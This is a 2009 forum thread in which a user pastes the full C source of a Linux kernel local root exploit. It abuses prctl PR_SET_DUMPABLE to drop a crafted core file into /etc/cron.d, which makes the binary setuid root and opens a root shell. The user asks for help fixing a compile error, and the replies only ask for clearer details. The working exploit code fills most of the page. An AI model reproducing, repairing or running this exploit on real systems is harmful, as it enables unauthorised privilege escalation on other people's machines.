some problmes

Discussion in 'C' started by mohammed saud, Aug 9, 2009.

  1. mohammed saud

    mohammed saud New Member

    Joined:
    May 19, 2009
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Code:
    :cryin:/* Linux >= 2.6.13 prctl kernel exploit
     *
     * (C) Julien TINNES
     *
     * If you read the Changelog from 2.6.13 you've probably seen:
     *  [PATCH] setuid core dump
     * 
     * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
     * user setable argument to PR_SET_DUMPABLE.
     * 
     * This flaw allows us to create a root owned coredump into any directory.
     * This is trivially exploitable.
     *
     */
    
    #include <sys/types.h>
    #include <sys/time.h>
    #include <sys/resource.h>
    #include <sys/prctl.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <errno.h>
    #include <signal.h>
    #include <stdlib.h>
    #include <time.h>
    
    #define CROND "/etc/cron.d"
    #define BUFSIZE 2048
    
    
    struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
    
    char    crontemplate[]=
    "#/etc/cron.d/core suid_dumpable exploit\n"
    "SHELL=/bin/sh\n"
    "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
    "#%s* * * * *    root     chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
    
    char    cronstring[BUFSIZE];
    char    fname[BUFSIZE];
    
    struct timeval te;
    
    void sh(int sn) {
        execl(fname, fname, (char *) NULL);
    }
        
    
    int    main(int argc, char *argv[]) {
    
        int nw, pid;
    
        if (geteuid() == 0) {
            printf("[+] getting root shell\n");
            setuid(0);
            setgid(0);
            if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
                perror("[-] execle");
                return 1;
            }
        }
    
        printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
    
        /* get our file name */
        if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
            perror("[-] readlink");
            printf("This is not fatal, rewrite the exploit\n");
        }
    
        if (signal(SIGUSR1, sh) == SIG_ERR) {
            perror("[-] signal");
            return 1;
        }
        printf("[+] Installed signal handler\n");
    
        /* Let us create core files */
        setrlimit(RLIMIT_CORE, &myrlimit);
        if (chdir(CROND) == -1) {
            perror("[-] chdir");
            return 1;
        }
    
        /* exploit the flaw */
        if (prctl(PR_SET_DUMPABLE, 2) == -1) {
            perror("[-] prtctl");
            printf("Is you kernel version >= 2.6.13 ?\n");
            return 1;
        }
    
        printf("[+] We are suidsafe dumpable!\n");
    
        /* Forge the string for our core dump */
        nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
        if (nw >= sizeof(cronstring)) {
            printf("[-] cronstring is too small\n");
            return 1;
        }
        printf("[+] Malicious string forged\n");
    
        if ((pid=fork()) == -1) {
            perror("[-] fork");
            return 1;
        }
    
        if (pid == 0) {
            /* This is not the good way to do it ;) */
            sleep(120);
            exit(0);
        }
    
        /* SEGFAULT the child */
        printf("[+] Segfaulting child\n");
        if (kill(pid, 11) == -1) {
            perror("[-] kill");
            return 1;
        }
        if (gettimeofday(&te, NULL) == 0) 
            printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
        sleep(120);
    
        printf("[-] It looks like the exploit failed\n");
    
        return 1;
    }
    
    / I wrot by linux in the terminl it's take for me message some cood problems
    struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

    please and please and please help meeeeeeeeeeeee:cryin:
     
    Last edited by a moderator: Aug 9, 2009
  2. xpi0t0s

    xpi0t0s Mentor

    Joined:
    Aug 6, 2004
    Messages:
    3,009
    Likes Received:
    203
    Trophy Points:
    63
    Occupation:
    Senior Support Engineer
    Location:
    England
    Please:
    (a) Use code blocks when posting code
    (b) DO NOT post duplicate threads http://www.go4expert.com/showthread.php?t=18939
    (c) be more clear about precisely what help you need and provide all relevant details (which may in this case include some error messages, but to be honest I really can't decode "I wrot by linux in the terminl it's take for me message some cood problems" so it's difficult to guess what details may be relevant.)
     
  3. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    389
    Trophy Points:
    83
    I deleted other thread.
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice